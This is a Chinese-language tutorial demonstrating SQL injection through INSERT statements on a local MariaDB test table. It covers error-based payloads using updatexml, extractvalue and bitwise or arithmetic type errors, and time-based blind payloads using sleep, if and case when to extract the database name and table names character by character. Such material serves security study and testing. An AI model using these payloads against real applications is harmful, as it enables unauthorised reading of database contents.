[sql 注入] insert 報錯注入與延時盲注
阿新 • • 發佈:2020-11-25
insert注入的技巧在於如何在一個欄位值內構造閉合。
insert 報錯注入
演示案例所用的表:
MariaDB [mysql]> desc test; +--------+----------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +--------+----------+------+-----+---------+-------+ | id | int(10) | YES | | NULL | | | uname | char(10) | YES | | NULL | | | passwd | char(10) | YES | | NULL | | +--------+----------+------+-----+---------+-------+
0x01: insert數字型報錯注入
MariaDB [mysql]> insert into test values(1 and updatexml(1,concat(0x7e,database(),0x7e),1),'2','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'
0x02: insert字元型報錯注入
提示:字元型的關鍵在於如何在一個欄位值內構造閉合。
MariaDB [mysql]> insert into test values(1,'2' and updatexml(1,concat(0x7e,database(),0x7e),1) and '','3'); ERROR 1105 (HY000): XPATH syntax error: '~mysql~'
0x03: 用extractvalue代替updatexml
MariaDB [mysql]> insert into test values(1,'2' and extractvalue(1,concat(0x7e,database())) and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql'
0x04: 使用按位運算子製造insert數字型報錯注入
產生報錯是因為1和(select database())的值做按位運算,但是字元不能做按位運算,所以會報錯提示哪個值型別錯誤。"& , | , ^"運算同理。
MariaDB [mysql]> insert into test values(1 ^ (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
MariaDB [mysql]> insert into test values(1 | (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
MariaDB [mysql]> insert into test values(1 & (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
0x05: 使用按位運算子製造insert字元型報錯注入
insert into test values(1,'1' & (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
0x06: 使用算術運算子製造insert報錯注入(+,-,%,/),靈活運用按位運算子,邏輯運算子,算術運算子。
MariaDB [mysql]> insert into test values(1,'1' + (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' - (select database()) and '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' / (select database()) or '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) | '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) / '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
insert延時盲注
在學習延時盲注之前你需要具備sql(sleep(),if(),substr(),ascii(),case when)的用法。
0x07: 一個簡單示例
原始正常語句:
MariaDB [mysql]> insert into test values(1,('2'),'3');
Query OK, 1 row affected (0.005 sec)
MariaDB [mysql]> insert into test values(1,('1') and sleep(3) and (''),'3');
Query OK, 1 row affected, 1 warning (3.002 sec)
0x08: 猜測當前所在庫的名稱長度,如果資料庫長度等於5則延時3秒輸出內容。
MariaDB [mysql]> insert into test values(1,('1') and sleep(if((select length(database()))=5,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.007 sec)
0x09: 猜測當前庫的第一個表名的第一個字元的ascii碼。慢慢去理解,慢就是快。
實際的值:
MariaDB [mysql]> select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));
+---------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) |
+---------------------------------------------------------------------------------------------------------------+
| 112 |
+---------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)
insert盲注如下所示:
MariaDB [mysql]> insert into test values(1,('1') and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=112,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.005 sec)
0x10: 用case then代替if():
MariaDB [mysql]> insert into test values(1,('2') and case when (select length(database())) = 5 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.002 sec)
MariaDB [mysql]> insert into test values(1,('2') and case when ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 112 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.004 sec)